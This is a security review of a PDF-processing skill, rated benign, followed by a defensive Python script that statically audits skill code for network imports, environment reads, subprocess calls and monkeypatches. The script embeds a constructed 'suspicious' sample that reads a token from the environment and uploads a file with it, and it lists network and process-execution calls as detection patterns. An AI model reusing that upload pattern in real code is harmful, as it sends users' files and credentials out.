Skill v0.1.0

ClawScan security

pdf · ClawHub's context-aware review of the artifact, metadata, and declared behavior.

Scanner verdict

Benign · Apr 15, 2026, 1:35 PM
Verdict
benign
Confidence
high
Model
gpt-5-mini
Summary
The skill's code, instructions, and requirements are consistent with a PDF-processing toolkit and do not request unrelated credentials or hidden network endpoints.
Guidance
This skill appears internally consistent for local PDF processing, but review these points before installing or running it:

(1) Dependencies: the scripts require many Python packages and several command-line tools (poppler, qpdf, pdftk, tesseract). Install them in a controlled environment (virtualenv or container).

(2) Monkeypatch: the fillable-fields script monkeypatches a pypdf method to work around a library bug. This changes the library's behavior for the whole process, not just for the script's own calls; run it on trusted systems and test with non-sensitive PDFs first.

(3) Untrusted PDFs: a maliciously crafted PDF can exploit vulnerabilities in the parsing libraries and tools. Keep those dependencies patched, and do not process sensitive documents with unreviewed code or alongside untrusted input.

(4) Manual validation steps: forms.md requires manual image inspection and iterative fixes. Do not skip those steps or blindly accept automated bounding boxes.

(5) License: the included LICENSE.txt is restrictive; confirm its terms are compatible with your intended use.

Recommended precautions: run in an isolated environment, install and pin known-good dependency versions, inspect the scripts and try them on sample PDFs, and do not feed in highly sensitive documents until you have validated the behavior.

Review Dimensions

Purpose & Capability
ok · The name and description (PDF extraction, creation, merging, forms) match the included SKILL.md and the provided scripts (form extraction and filling, conversion to images, validation). No unrelated environment variables, binaries, or config paths are requested.
Instruction Scope
note · Runtime instructions are focused on local PDF manipulation and running the included Python scripts. They require the user or agent to run scripts and to perform manual visual validation for non-fillable forms. Note: the scripts mutate library behavior (a monkeypatch of pypdf's get_inherited) to work around a known pypdf bug. This is explained in the code, but be aware that it replaces a library method at runtime for the whole process, so any other pypdf user in that process sees the patched behavior.
Install Mechanism
ok · No install spec is provided (instruction-only skill with bundled scripts), which keeps install-time risk low. The skill does, however, rely on several external Python and CLI packages (pypdf, pdfplumber, reportlab, pdf2image, poppler tools, pytesseract, Pillow, etc.) that the operator must install. There is no automatic download of arbitrary code from external URLs.
Credentials
ok · The skill requires no environment variables, credentials, or special config paths. All operations are local and operate on user-supplied PDF files.
Persistence & Privilege
ok · The skill does not request persistent or always-on inclusion and does not modify other skills or system-wide settings. It runs scripts locally and writes only the output files the user requests.
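One way to check the Summary, Credentials and Instruction Scope findings above yourself before installing: a static AST audit of the bundled scripts that lists network-capable imports, environment-variable reads, external process calls and monkeypatches, without executing anything. This is an added example, not ClawHub's scanner and not code from the pdf skill. The two scripts it inspects are constructed inline to mimic the patterns the review describes (the pypdf class and method names in the first sample are assumed for illustration, not copied from the skill), and the module and call lists are a starting point rather than an exhaustive set.

```python
"""Static pre-install audit of a skill's bundled Python scripts (added example).

Parses each script with the ast module and never executes it. Reports network-
capable imports, environment-variable reads, external process execution, and
monkeypatches (assignments to attributes of an imported module or class).
"""
import ast
from typing import Dict, List

# Starting point, not exhaustive: extend for the ecosystem you are reviewing.
NETWORK_MODULES = {"socket", "urllib", "http", "requests", "httpx",
                   "ftplib", "smtplib", "aiohttp", "paramiko"}
PROCESS_CALLS = {"subprocess.run", "subprocess.Popen", "subprocess.call",
                 "subprocess.check_output", "os.system", "os.popen"}
ENV_CALLS = {"os.getenv", "os.environ.get"}


def _dotted(node: ast.AST) -> str:
    """Render a Name/Attribute chain such as pypdf.generic.X.method as text."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if not isinstance(node, ast.Name):
        return ""  # call results, subscripts etc. are not a plain dotted path
    parts.append(node.id)
    return ".".join(reversed(parts))


def _str_const(node: ast.AST) -> str:
    """String literal value, or a marker when the key is computed at runtime."""
    if isinstance(node, ast.Constant) and isinstance(node.value, str):
        return node.value
    return "<dynamic>"


def audit_script(source: str) -> Dict[str, List[str]]:
    """Return the four finding lists for one script's source text."""
    tree = ast.parse(source)
    bound_imports = set()  # local names bound by import / from-import
    findings: Dict[str, List[str]] = {"network_imports": [], "env_reads": [],
                                      "process_calls": [], "monkeypatches": []}

    for node in ast.walk(tree):  # pass 1: what the script imports
        if isinstance(node, ast.Import):
            for alias in node.names:
                bound_imports.add(alias.asname or alias.name.split(".")[0])
                if alias.name.split(".")[0] in NETWORK_MODULES:
                    findings["network_imports"].append(alias.name)
        elif isinstance(node, ast.ImportFrom) and node.module:
            bound_imports.update(a.asname or a.name for a in node.names)
            if node.module.split(".")[0] in NETWORK_MODULES:
                findings["network_imports"].append(node.module)

    for node in ast.walk(tree):  # pass 2: how it uses them
        if isinstance(node, ast.Call):
            name = _dotted(node.func)
            if name in PROCESS_CALLS:
                findings["process_calls"].append(name)
            elif name in ENV_CALLS:
                key = _str_const(node.args[0]) if node.args else "<dynamic>"
                findings["env_reads"].append(key)
        elif isinstance(node, ast.Subscript) and _dotted(node.value) == "os.environ":
            findings["env_reads"].append(_str_const(node.slice))
        elif isinstance(node, ast.Assign):
            for target in node.targets:
                # `ImportedThing.attr = ...` rebinds a method or attribute on code
                # the script did not define: a monkeypatch visible process-wide.
                if (isinstance(target, ast.Attribute)
                        and _dotted(target).split(".")[0] in bound_imports):
                    findings["monkeypatches"].append(_dotted(target))
    return findings


def matches_local_pdf_profile(findings: Dict[str, List[str]]) -> bool:
    """True when the script stays within what a local PDF toolkit needs:
    no network modules and no environment (credential-style) reads."""
    return not findings["network_imports"] and not findings["env_reads"]


# Constructed sample resembling the pattern the review describes. The pypdf
# class/method names are assumed for illustration, not copied from the skill.
PDF_SCRIPT = '''
import subprocess
from pypdf import PdfReader
from pypdf.generic import DictionaryObject

_orig = DictionaryObject.get_inherited

def _get_inherited_fixed(self, key, default=None):
    return _orig(self, key, default)  # stand-in for the bug workaround

DictionaryObject.get_inherited = _get_inherited_fixed  # in-process patch

def flatten(in_path, out_path):
    reader = PdfReader(in_path)
    subprocess.run(["qpdf", "--linearize", in_path, out_path], check=True)
'''

# Constructed sample of what a local PDF skill should NOT contain.
SUSPICIOUS_SCRIPT = '''
import os
import requests

def upload(path):
    token = os.environ["UPLOAD_TOKEN"]
    with open(path, "rb") as f:
        requests.post(os.getenv("UPLOAD_URL"), data=f, headers={"X-Token": token})
'''

if __name__ == "__main__":
    for label, src in (("pdf sample", PDF_SCRIPT), ("suspicious sample", SUSPICIOUS_SCRIPT)):
        result = audit_script(src)
        status = "within local-PDF profile" if matches_local_pdf_profile(result) else "REVIEW"
        print(f"{label}: {status} {result}")
```

Run it over the skill's bundled scripts by reading each file into `audit_script`. A monkeypatch finding such as the pypdf one should match what the code comments claim to fix, and any network import or environment read in a skill that declares none is grounds to stop and read further. The check is deliberately simple: `from subprocess import run` or dynamic imports via `importlib` slip past it, so treat an empty report as a prompt for manual review, not a clearance.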